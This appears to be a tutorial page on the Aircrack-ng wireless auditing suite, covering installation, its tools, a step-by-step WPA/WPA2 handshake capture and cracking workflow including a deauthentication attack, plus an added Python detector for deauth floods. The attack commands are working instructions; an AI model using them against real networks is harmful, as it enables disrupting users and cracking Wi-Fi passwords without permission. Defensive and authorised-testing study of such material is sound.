What is Aircrack-ng?
Aircrack-ng is the industry-standard open-source suite for 802.11 wireless network security auditing. It is not a single tool but a collection of specialized utilities that together cover the full wireless attack workflow: putting an adapter into monitor mode, capturing packets, performing deauthentication attacks to force handshake capture, injecting crafted packets, and cracking WEP keys or WPA/WPA2 handshakes offline via dictionary or brute-force attacks. It is the foundational toolkit that most other wireless frameworks — including Wifite and Airgeddon — are built on top of.
Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
    # Update packages
    sudo apt update

    # Install Aircrack-ng suite (pre-installed on Kali)
    sudo apt install aircrack-ng -y

    # Verify all tools are available
    aircrack-ng --version
    airodump-ng --version
    aireplay-ng --version
Suite Components
- airmon-ng: Enable/disable monitor mode on a wireless interface
- airodump-ng: Capture raw 802.11 frames; scan for APs and clients
- aireplay-ng: Inject packets; perform deauth, ARP replay, and fake auth attacks
- aircrack-ng: Crack WEP keys or WPA/WPA2 handshakes from a capture file
- airbase-ng: Create a fake access point (software AP / Evil Twin)
- airdecap-ng: Decrypt WEP/WPA capture files given a known key
- packetforge-ng: Forge arbitrary 802.11 packets for injection
WPA/WPA2 Attack Workflow
    # Step 1: Kill interfering processes and enable monitor mode
    sudo airmon-ng check kill
    sudo airmon-ng start wlan0
    # Interface is now wlan0mon

    # Step 2: Scan for nearby networks
    sudo airodump-ng wlan0mon

    # Step 3: Lock onto target AP and capture traffic
    # Replace BSSID and channel with target values
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

    # Step 4: Deauth a connected client to force WPA handshake
    # (run in a second terminal while capture is running)
    sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
    # Look for "WPA handshake:" in airodump-ng output

    # Step 5: Crack the handshake offline with a wordlist
    aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
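The deauthentication burst in Step 4 is the part of this workflow that is visible to anyone monitoring the air, so it is the natural detection point. The following is an added example, not part of the original page or of the Aircrack-ng project: it parses raw monitor-mode frames (radiotap header plus 802.11 header) and flags a burst of deauth/disassoc frames aimed at one client. The function names, the threshold of 5 frames per second, and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10  # 802.11 management frame subtypes

def parse_mgmt(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 8:                                   # shorter than a radiotap header
        return None
    dot11 = frame[struct.unpack_from("<H", frame, 2)[0]:]  # skip radiotap (length at offset 2)
    if len(dot11) < 26:                                  # 24-byte header + 2-byte reason code
        return None
    ftype, subtype = (dot11[0] >> 2) & 0x3, (dot11[0] >> 4) & 0xF
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):  # type 0 = management
        return None
    mac = lambda b: b.hex(":")
    return (subtype, mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]),
            struct.unpack_from("<H", dot11, 24)[0])

def detect_floods(records, threshold=5, window=1.0):
    """records: (timestamp, raw_frame) pairs in time order. Returns one alert
    (bssid, dst, count, ts) each time a (bssid, dst) pair crosses the threshold."""
    recent, active, alerts = defaultdict(deque), set(), []
    for ts, raw in records:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        _, dst, _, bssid, _ = parsed
        key, q = (bssid, dst), recent[(bssid, dst)]
        q.append(ts)
        while ts - q[0] > window:        # drop frames that fell out of the window
            q.popleft()
        if len(q) < threshold:
            active.discard(key)          # burst ended; allow a future alert
        elif key not in active:
            active.add(key)
            alerts.append((bssid, dst, len(q), ts))
    return alerts

def make_frame(subtype, dst, src, bssid, reason=7):
    """Constructed sample: minimal 8-byte radiotap header + 802.11 management frame."""
    to_b = lambda m: bytes.fromhex(m.replace(":", ""))
    hdr = struct.pack("<BBH", subtype << 4, 0, 0) + to_b(dst) + to_b(src) + to_b(bssid)
    return struct.pack("<BBHI", 0, 0, 8, 0) + hdr + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample traffic: a 10-frame burst, one beacon, one isolated deauth.
AP, STA = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"
SAMPLE = [(i * 0.05, make_frame(DEAUTH, STA, AP, AP)) for i in range(10)]
SAMPLE += [(2.0, make_frame(8, "ff:ff:ff:ff:ff:ff", AP, AP)),
           (3.0, make_frame(DEAUTH, "22:22:22:22:22:22", "02:00:00:00:00:01",
                            "02:00:00:00:00:01", reason=3))]
```

On networks where 802.11w Protected Management Frames are negotiated, clients discard unauthenticated deauthentication frames, which removes the need to rely on detection alone.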
Common Use Cases
- Authorized wireless penetration testing of WEP/WPA/WPA2 networks
- CTF (Capture The Flag) challenges involving wireless captures
- Testing the strength of a Wi-Fi password against dictionary attacks
- Foundation for automated wireless tools like Wifite and Airgeddon
Tips & Best Practices
Always run airmon-ng check kill before starting monitor mode — background processes like NetworkManager will interfere with packet capture. After your assessment, restore managed mode with airmon-ng stop wlan0mon and restart networking with service NetworkManager start. For faster cracking, convert the handshake to hashcat format (hccapx) with aircrack-ng -j and use GPU acceleration via hashcat -m 2500.
Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs before using in live engagements.